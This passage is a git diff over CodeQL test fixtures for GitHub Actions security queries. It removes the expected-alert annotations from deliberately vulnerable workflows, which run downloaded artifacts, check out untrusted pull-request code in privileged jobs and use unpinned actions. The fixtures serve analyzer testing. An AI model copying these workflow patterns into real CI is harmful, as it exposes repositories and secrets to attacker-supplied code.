a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning11.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning11.yml 
@@ -29,13 +29,13 @@ jobs: }); let fs = require('fs'); fs.writeFileSync(`${process.env.GITHUB_WORKSPACE}/sonarcloud-data.zip`, Buffer.from(download.data)); - - name: Unzip # $ Alert[actions/artifact-poisoning/critical] + - name: Unzip run: | unzip sonarcloud-data.zip -d sonarcloud-data ls -a sonarcloud-data - name: Run command run: - ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build # $ Sink[actions/artifact-poisoning/critical] + ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning12.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning12.yml index 953d06f55c71..aa884b7eca74 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning12.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning12.yml @@ -29,12 +29,12 @@ jobs: }); let fs = require('fs'); fs.writeFileSync(`${process.env.GITHUB_WORKSPACE}/sonarcloud-data.zip`, Buffer.from(download.data)); - - name: Unzip # $ Alert[actions/artifact-poisoning/critical] + - name: Unzip run: | unzip sonarcloud-data.zip ls -a sonarcloud-data - name: Run command run: - python foo/x.py # $ Sink[actions/artifact-poisoning/critical] + python foo/x.py diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning21.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning21.yml index 81f42aa335b7..e73548895d37 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning21.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning21.yml 
@@ -10,14 +10,14 @@ jobs: Download: runs-on: ubuntu-latest steps: - - uses: dawidd6/action-download-artifact@v2 # $ Alert[actions/unpinned-tag] + - uses: dawidd6/action-download-artifact@v2 with: name: artifact_name workflow: wf.yml path: foo - - name: Run command # $ Alert[actions/artifact-poisoning/critical] + - name: Run command run: | - sh foo/cmd # $ Sink[actions/artifact-poisoning/critical] + sh foo/cmd diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning22.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning22.yml index ca69571fab22..ac970fff8404 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning22.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning22.yml @@ -10,12 +10,12 @@ jobs: Download: runs-on: ubuntu-latest steps: - - uses: dawidd6/action-download-artifact@v2 # $ Alert[actions/unpinned-tag] + - uses: dawidd6/action-download-artifact@v2 with: name: artifact_name workflow: wf.yml - - name: Run command # $ Alert[actions/artifact-poisoning/critical] - run: sh cmd # $ Sink[actions/artifact-poisoning/critical] + - name: Run command + run: sh cmd diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning31.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning31.yml index d08b18147fe8..0e7c6f97cf5d 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning31.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning31.yml 
@@ -12,11 +12,11 @@ jobs: steps: - run: | gh run download "${{github.event.workflow_run.id}}" --repo "${GITHUB_REPOSITORY}" --name "artifact_name" - - name: Unzip # $ Alert[actions/artifact-poisoning/critical] + - name: Unzip run: | unzip artifact_name.zip -d foo - name: Run command - run: ./foo/cmd # $ Sink[actions/artifact-poisoning/critical] + run: ./foo/cmd diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning32.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning32.yml index a573db866bda..7a837ee42d2c 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning32.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning32.yml @@ -13,9 +13,9 @@ jobs: - run: | gh run download "${{github.event.workflow_run.id}}" --repo "${GITHUB_REPOSITORY}" --name "artifact_name" --dir foo unzip artifact_name.zip -d bar - - name: Run command # $ Alert[actions/artifact-poisoning/critical] + - name: Run command run: | - ./bar/cmd # $ Sink[actions/artifact-poisoning/critical] + ./bar/cmd diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning33.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning33.yml index b40091d7808f..39ec063c7b64 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning33.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning33.yml @@ -13,9 +13,9 @@ jobs: - run: | gh run download "${{github.event.workflow_run.id}}" --repo "${GITHUB_REPOSITORY}" --name "artifact_name" --dir foo unzip foo/artifact_name.zip - - name: Run command # $ Alert[actions/artifact-poisoning/critical] + - name: Run command run: | - ./bar/cmd # $ Sink[actions/artifact-poisoning/critical] + ./bar/cmd 
diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning34.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning34.yml index b4319fd42f99..905a4eaccb17 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning34.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning34.yml @@ -13,13 +13,13 @@ jobs: - run: | gh run download "${{github.event.workflow_run.id}}" --repo "${GITHUB_REPOSITORY}" --name "artifact_name" --dir foo unzip foo/artifact_name.zip - - name: Setup Node.js # $ Alert[actions/artifact-poisoning/critical] + - name: Setup Node.js uses: actions/setup-node@v4 with: node-version: 21 - run: | npm install - npm run lint # $ Sink[actions/artifact-poisoning/critical] + npm run lint diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning41.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning41.yml index 645fe636d3e6..afa3e15132e3 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning41.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning41.yml @@ -18,8 +18,8 @@ jobs: gh api $url > "$name.zip" unzip -d "foo" "$name.zip" done - - name: Run command # $ Alert[actions/artifact-poisoning/critical] - run: ./foo/cmd # $ Sink[actions/artifact-poisoning/critical] + - name: Run command + run: ./foo/cmd diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning42.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning42.yml index 24fef012e0e3..d3100d46edc7 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning42.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning42.yml 
@@ -18,8 +18,8 @@ jobs: gh api $url > "$name.zip" unzip "$name.zip" done - - name: Run command # $ Alert[actions/artifact-poisoning/critical] - run: ./cmd # $ Sink[actions/artifact-poisoning/critical] + - name: Run command + run: ./cmd diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning71.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning71.yml index 4430b91fba94..8cb380ae0436 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning71.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning71.yml @@ -7,12 +7,12 @@ jobs: runs-on: ubuntu-latest steps: - name: download pr artifact - uses: dawidd6/action-download-artifact@v2 # $ Alert[actions/unpinned-tag] + uses: dawidd6/action-download-artifact@v2 with: workflow: ${{github.event.workflow_run.workflow_id}} run_id: ${{github.event.workflow_run.id}} name: artifact - - name: Use artifact # $ Alert[actions/artifact-poisoning/critical] + - name: Use artifact run: | - sed -f config foo.md > bar.md # $ Sink[actions/artifact-poisoning/critical] + sed -f config foo.md > bar.md diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning81.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning81.yml index 5a6bf1d62254..399adf3dff77 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning81.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning81.yml @@ -11,7 +11,7 @@ jobs: - uses: actions/checkout@v4 with: ref: ${{ github.event.pull_request.head.sha }} - - run: | # $ Alert[actions/untrusted-checkout/medium] + - run: | bash script.sh - uses: actions/upload-artifact@v4 with: 
@@ -28,4 +28,4 @@ jobs: - uses: actions/download-artifact@v4.0.0 with: name: results - - run: python test.py # $ Alert[actions/artifact-poisoning/critical] Alert[actions/artifact-poisoning/path-traversal] Sink[actions/artifact-poisoning/critical] + - run: python test.py diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning91.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning91.yml index 184661fda499..af9f01b572f1 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning91.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning91.yml @@ -15,7 +15,7 @@ jobs: runs-on: ubuntu-latest steps: - uses: actions/checkout@9bb56186c3b09b4f86b1c65136769dd318469633 # v4.1.2 - - uses: ./.github/actions/download-artifact # $ Alert[actions/unversioned-immutable-action] + - uses: ./.github/actions/download-artifact - id: metadata run: | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt | tail -n 1)" @@ -25,5 +25,5 @@ jobs: - uses: actions/checkout@9bb56186c3b09b4f86b1c65136769dd318469633 # v4.1.2 with: ref: ${{ env.PR_COMMIT }} - - uses: ./.github/actions/install-deps # $ Alert[actions/unversioned-immutable-action] + - uses: ./.github/actions/install-deps - run: make snapshot diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning92.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning92.yml index 806b99204678..e35bc73c3bda 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning92.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning92.yml 
@@ -15,7 +15,7 @@ jobs: runs-on: ubuntu-latest steps: - uses: actions/checkout@9bb56186c3b09b4f86b1c65136769dd318469633 # v4.1.2 - - uses: ./.github/actions/download-artifact-2 # $ Alert[actions/unversioned-immutable-action] + - uses: ./.github/actions/download-artifact-2 - id: metadata run: | pr_number="$(head -n 2 /tmp/artifacts/metadata.txt | tail -n 1)" @@ -25,5 +25,5 @@ jobs: - uses: actions/checkout@9bb56186c3b09b4f86b1c65136769dd318469633 # v4.1.2 with: ref: ${{ env.PR_COMMIT }} - - uses: ./.github/actions/install-deps # $ Alert[actions/unversioned-immutable-action] - - run: make snapshot # $ Sink[actions/artifact-poisoning/critical] + - uses: ./.github/actions/install-deps + - run: make snapshot diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning96.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning96.yml index 6498802afc9c..f970a3fa1979 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning96.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning96.yml @@ -15,4 +15,4 @@ jobs: with: github-token: ${{ secrets.GITHUB_TOKEN }} run-id: ${{ github.event.workflow_run.id }} - - run: npm install # $ Alert[actions/artifact-poisoning/critical] Sink[actions/artifact-poisoning/critical] \ No newline at end of file + - run: npm install \ No newline at end of file diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/auto_ci.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/auto_ci.yml index 7093027c4d91..28ffab637f03 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/auto_ci.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/auto_ci.yml 
@@ -24,7 +24,7 @@ jobs: ref: ${{ github.event.pull_request.head.ref }} repository: ${{ github.event.pull_request.head.repo.full_name }} - - name: Set up Python ${{ env.min-python-version }} # $ Alert[actions/untrusted-checkout/critical] + - name: Set up Python ${{ env.min-python-version }} uses: actions/setup-python@v2 with: python-version: ${{ env.min-python-version }} @@ -34,7 +34,7 @@ jobs: python -m pip install --upgrade pip pip install -r requirements.txt - - name: Lint with flake8 # $ Sink[actions/untrusted-checkout/critical] + - name: Lint with flake8 run: flake8 - name: Check black formatting @@ -49,7 +49,7 @@ jobs: run: mypy if: success() || failure() - test: # $ Sink[actions/untrusted-checkout/critical] + test: permissions: # Gives the action the necessary permissions for publishing new # comments in pull requests. @@ -71,7 +71,7 @@ jobs: ref: ${{ github.event.pull_request.head.ref || github.event.pull_request.base.ref }} repository: ${{ github.event.pull_request.head.repo.full_name }} - - name: Set up Python ${{ matrix.python-version }} # $ Alert[actions/untrusted-checkout/critical] + - name: Set up Python ${{ matrix.python-version }} uses: actions/setup-python@v2 with: python-version: ${{ matrix.python-version }} @@ -81,7 +81,7 @@ jobs: python -m pip install --upgrade pip pip install -r requirements.txt - - name: Run unittest tests with coverage # $ Sink[actions/untrusted-checkout/critical] + - name: Run unittest tests with coverage run: | pytest -n auto --cov=autogpt --cov-report term-missing --cov-branch --cov-report xml --cov-report term env: @@ -90,8 +90,8 @@ jobs: AGENT_MODE: ${{ vars.AGENT_MODE }} AGENT_TYPE: ${{ vars.AGENT_TYPE }} - - name: Upload coverage reports to Codecov # $ Sink[actions/untrusted-checkout/critical] - uses: codecov/codecov-action@v3 # $ Alert[actions/unpinned-tag] + - name: Upload coverage reports to Codecov + uses: codecov/codecov-action@v3 - name: Stage new files and commit id: stage_files 
@@ -108,7 +108,7 @@ jobs: - name: Create PR id: create_pr if: ${{ env.TIMESTAMP_COMMIT != null }} - uses: peter-evans/create-pull-request@v5 # $ Alert[actions/unpinned-tag] + uses: peter-evans/create-pull-request@v5 with: commit-message: Update cassettes branch: cassette-diff-PR-${{ github.event.pull_request.number }}-${{ env.TIMESTAMP_COMMIT }} @@ -124,7 +124,7 @@ jobs: - name: Comment PR URL in the current PR if: ${{ env.TIMESTAMP_COMMIT != null }} - uses: thollander/actions-comment-pull-request@v2 # $ Alert[actions/unpinned-tag] + uses: thollander/actions-comment-pull-request@v2 with: GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} message: | diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/dependabot2.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/dependabot2.yml index a905b6b9d668..072eae4b1d2a 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/dependabot2.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/dependabot2.yml @@ -35,7 +35,7 @@ jobs: ref: ${{ github.event.pull_request.head.ref }} token: ${{ secrets.DEPENDABOT_AUTOBUILD }} - - name: Read .nvmrc # $ Alert[actions/untrusted-checkout/medium] + - name: Read .nvmrc id: nvm run: echo "NVMRC=$(cat .nvmrc)" >> $GITHUB_OUTPUT diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/dependabot3.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/dependabot3.yml index 308cc9fde518..1bda517c9a12 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/dependabot3.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/dependabot3.yml @@ -17,7 +17,7 @@ jobs: show-progress: false ref: ${{ github.event.pull_request.head.sha }} - - uses: actions/setup-java@v4 # $ Alert[actions/untrusted-checkout/critical] + - uses: actions/setup-java@v4 with: distribution: temurin java-version: 17 
@@ -45,7 +45,7 @@ jobs: env: GH_TOKEN: ${{ secrets.GITHUB_TOKEN }} - - name: Merge Dependabot pull request # $ Sink[actions/untrusted-checkout/critical] + - name: Merge Dependabot pull request if: steps.set-milestone.outputs.mergeEnabled run: gh pr merge ${{ github.event.pull_request.number }} --auto --rebase env: diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable.yml index b338fbc5f16b..3b8a6d6dd62a 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable.yml @@ -23,7 +23,7 @@ jobs: - uses: actions/checkout@v2 with: ref: ${{ inputs.branch }} - - run: | # $ Alert[actions/untrusted-checkout/critical] + - run: | npm install npm run lint - # $ Sink[actions/untrusted-checkout/critical] + diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/gitcheckout.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/gitcheckout.yml index f34f96996c50..ab121239c6e1 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/gitcheckout.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/gitcheckout.yml @@ -15,9 +15,9 @@ jobs: git merge --no-commit --no-edit origin/$HEAD_BRANCH env: HEAD_BRANCH: ${{ github.head_ref }} - - uses: actions/setup-node@v1 # $ Alert[actions/untrusted-checkout/critical] + - uses: actions/setup-node@v1 # 2. Potentially untrusted commands are being run during "npm install" or "npm build" as # the build scripts and referenced packages are controlled by the author of the pull request - run: | npm install - npm build # $ Sink[actions/untrusted-checkout/critical] + npm build 
diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_3rd_party_action.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_3rd_party_action.yml index 984c56d9028d..221854ec2042 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_3rd_party_action.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_3rd_party_action.yml @@ -11,7 +11,7 @@ jobs: steps: - name: (PR comment) Get PR branch if: ${{ github.event_name == 'issue_comment' }} - uses: xt0rted/pull-request-comment-branch@v2 # $ Alert[actions/unpinned-tag] + uses: xt0rted/pull-request-comment-branch@v2 id: comment-branch - name: (PR comment) Checkout PR branch if: ${{ github.event_name == 'issue_comment' }} @@ -24,7 +24,7 @@ jobs: steps: - name: (PR comment) Get PR branch if: ${{ github.event_name == 'issue_comment' }} - uses: xt0rted/pull-request-comment-branch@v2 # $ Alert[actions/unpinned-tag] + uses: xt0rted/pull-request-comment-branch@v2 id: comment-branch - name: (PR comment) Checkout PR branch @@ -38,7 +38,7 @@ jobs: steps: - name: resolve pr refs id: refs - uses: eficode/resolve-pr-refs@main # $ Alert[actions/unpinned-tag] + uses: eficode/resolve-pr-refs@main with: token: ${{ secrets.GITHUB_TOKEN }} diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_direct.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_direct.yml index 133d033a4e9e..ece4c02c3565 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_direct.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_direct.yml 
@@ -13,7 +13,7 @@ jobs: uses: actions/checkout@v4 with: ref: ${{ github.event.pull_request.head.ref || github.head_ref }} # Checkout the branch that made the PR or the comment's PR branch - test2: # $ Alert[actions/untrusted-checkout/high] + test2: runs-on: ubuntu-latest if: github.event.issue.pull_request && github.event.comment.body == '/trigger release' steps: @@ -21,7 +21,7 @@ jobs: with: ref: refs/pull/${{ github.event.issue.number }}/merge - test3: # $ Alert[actions/untrusted-checkout/high] + test3: runs-on: ubuntu-latest if: github.event.issue.pull_request && github.event.comment.body == '/trigger release' steps: @@ -29,7 +29,7 @@ jobs: with: ref: ${{ format('refs/pull/{0}/merge', github.event.issue.number) }} - test4: # $ Alert[actions/untrusted-checkout/high] + test4: runs-on: ubuntu-latest steps: - name: Checkout Branch @@ -37,10 +37,10 @@ jobs: with: ref: ${{ (github.event_name == 'pull_request_review_comment') && format('refs/pull/{0}/merge', github.event.pull_request.number) || '' }} - test5: # $ Alert[actions/untrusted-checkout/high] + test5: runs-on: ubuntu-latest steps: - name: Checkout Branch uses: actions/checkout@v4 with: - ref: ${{ github.event_name == 'issue_comment' && format('refs/pull/{0}/merge', github.event.issue.number) || '' }} # $ Alert[actions/untrusted-checkout/high] + ref: ${{ github.event_name == 'issue_comment' && format('refs/pull/{0}/merge', github.event.issue.number) || '' }} diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_heuristic.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_heuristic.yml index 6dd5205c08e3..8c0865f598cd 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_heuristic.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_heuristic.yml 
@@ -30,7 +30,7 @@ jobs: with: ref: ${{ steps.get-sha.outputs.sha }} - test2: # $ Alert[actions/untrusted-checkout/high] + test2: runs-on: ubuntu-latest steps: @@ -47,4 +47,4 @@ jobs: echo "branch=$REF" >> $GITHUB_OUTPUT - uses: actions/checkout@v4 with: - ref: ${{ steps.vars.outputs.branch }} # $ Alert[actions/untrusted-checkout/high] + ref: ${{ steps.vars.outputs.branch }} diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_octokit.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_octokit.yml index b25d53c739ee..ac013eb6e2f9 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_octokit.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_octokit.yml @@ -27,12 +27,12 @@ jobs: with: ref: ${{ fromJson(steps.fetch_pr.outputs.data).head.ref }} token: ${{ secrets.GITHUB_TOKEN }} - - uses: actions/checkout@v4 # $ Alert[actions/untrusted-checkout/high] + - uses: actions/checkout@v4 with: ref: ${{ fromJson(steps.fetch_pr.outputs.data).head.sha }} token: ${{ secrets.GITHUB_TOKEN }} - test2: # $ Alert[actions/untrusted-checkout/high] + test2: runs-on: ubuntu-latest steps: - name: Get Info from comment @@ -59,7 +59,7 @@ jobs: with: ref: ${{ steps.get-sha.outputs.sha }} - test3: # $ Alert[actions/untrusted-checkout/high] + test3: if: github.event.comment.body == '@excalibot trigger release' && github.event.issue.pull_request runs-on: ubuntu-latest steps: @@ -80,7 +80,7 @@ jobs: with: ref: ${{ steps.sha.outputs.result }} - test4: # $ Alert[actions/untrusted-checkout/high] + test4: if: github.event.issue.pull_request && contains(github.event.comment.body, '!bench_parser') runs-on: ubuntu-latest steps: @@ -97,7 +97,7 @@ jobs: with: ref: ${{ steps.sha.outputs.result }} - test5: # $ Alert[actions/untrusted-checkout/high] + test5: runs-on: ubuntu-20.04 steps: - id: request 
@@ -111,4 +111,4 @@ jobs: with: token: ${{ secrets.GITHUB_TOKEN }} repository: ${{fromJson(steps.request.outputs.data).head.repo.full_name}} - ref: ${{fromJson(steps.request.outputs.data).head.ref}} # $ Alert[actions/untrusted-checkout/high] + ref: ${{fromJson(steps.request.outputs.data).head.ref}} diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_octokit2.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_octokit2.yml index 0831bc9217cb..8485ad0ed671 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_octokit2.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_octokit2.yml @@ -23,15 +23,15 @@ jobs: route: GET ${{ fromJson(steps.fetch_issue.outputs.data).pull_request.url }} env: GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} - - name: Checkout PR minor patch wildcard # $ Alert[actions/unversioned-immutable-action] + - name: Checkout PR minor patch wildcard - uses: actions/checkout@v2.x.xx with: ref: ${{ fromJson(steps.fetch_pr.outputs.data).head.ref }} token: ${{ secrets.GITHUB_TOKEN }} - - name: Checkout PR minor wildcard incomplete patch # $ Alert[actions/untrusted-checkout/high] Alert[actions/unversioned-immutable-action] + - name: Checkout PR minor wildcard incomplete patch uses: actions/checkout@v2.x. - - name: Run latest action # $ Alert[actions/unversioned-immutable-action] - uses: some-action/some-repo@latest # $ Alert[actions/unpinned-tag] + - name: Run latest action + uses: some-action/some-repo@latest with: some-input: some-value - name: run the latest checkout action diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/label_trusted_checkout1.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/label_trusted_checkout1.yml index 32cef70963ae..56bb143cf367 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/label_trusted_checkout1.yml 
+++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/label_trusted_checkout1.yml @@ -17,11 +17,11 @@ jobs: npm install npm build - - uses: completely/fakeaction@v2 # $ Alert[actions/unpinned-tag] + - uses: completely/fakeaction@v2 with: arg1: ${{ secrets.supersecret }} - - uses: fakerepo/comment-on-pr@v1 # $ Alert[actions/unpinned-tag] + - uses: fakerepo/comment-on-pr@v1 with: message: | Thank you! diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/label_trusted_checkout2.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/label_trusted_checkout2.yml index fef28af7925d..6014d08ed806 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/label_trusted_checkout2.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/label_trusted_checkout2.yml @@ -13,16 +13,16 @@ jobs: with: ref: ${{ github.event.pull_request.head.sha }} - - uses: actions/setup-node@v1 # $ Alert[actions/untrusted-checkout/critical] + - uses: actions/setup-node@v1 - run: | npm install npm build - - uses: completely/fakeaction@v2 # $ Alert[actions/unpinned-tag] Sink[actions/untrusted-checkout/critical] + - uses: completely/fakeaction@v2 with: arg1: ${{ secrets.supersecret }} - - uses: fakerepo/comment-on-pr@v1 # $ Alert[actions/unpinned-tag] + - uses: fakerepo/comment-on-pr@v1 with: message: | Thank you! diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/level0.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/level0.yml index 47aa7725a812..49908b7b4c51 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/level0.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/level0.yml 
@@ -33,7 +33,7 @@ jobs: - uses: step-security/harden-runner@63c24ba6bd7ba022e95695ff85de572c04a18142 # v2.7.0 with: egress-policy: audit - - uses: rlespinasse/github-slug-action@v4 # $ Alert[actions/unpinned-tag] + - uses: rlespinasse/github-slug-action@v4 with: short-length: 8 - name: Check for profanities in issue body @@ -100,7 +100,7 @@ jobs: uses: actions/checkout@v4 with: ref: ${{ github.event.pull_request.head.sha }} - - name: Setup Node.js # $ Alert[actions/untrusted-checkout/critical] + - name: Setup Node.js uses: actions/setup-node@v4 with: node-version: 21 @@ -109,7 +109,7 @@ jobs: npm run lint npm start - toppings: # $ Sink[actions/untrusted-checkout/critical] + toppings: runs-on: ubuntu-latest timeout-minutes: 1 if: github.event_name == 'pull_request' @@ -126,11 +126,11 @@ jobs: uses: actions/checkout@v4 with: ref: ${{ github.event.pull_request.head.sha }} - - name: Setup Node.js # $ Alert[actions/untrusted-checkout/critical] + - name: Setup Node.js uses: actions/setup-node@v4 with: node-version: 21 - run: | npm install - npm run lint # $ Sink[actions/untrusted-checkout/critical] + npm run lint diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/mend.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/mend.yml index dbeeb1e0eebc..b539c562084e 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/mend.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/mend.yml @@ -26,8 +26,8 @@ jobs: fetch-depth: 1 ref: ${{ steps.set_ref.outputs.ref }} - - name: "setup ruby" # $ Alert[actions/untrusted-checkout/medium] + - name: "setup ruby" if: success() - uses: "ruby/setup-ruby@v1" # $ Alert[actions/unpinned-tag] + uses: "ruby/setup-ruby@v1" with: ruby-version: 2.7 diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/poc.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/poc.yml index 4035b3fb4643..6900c3bc23fa 100644 
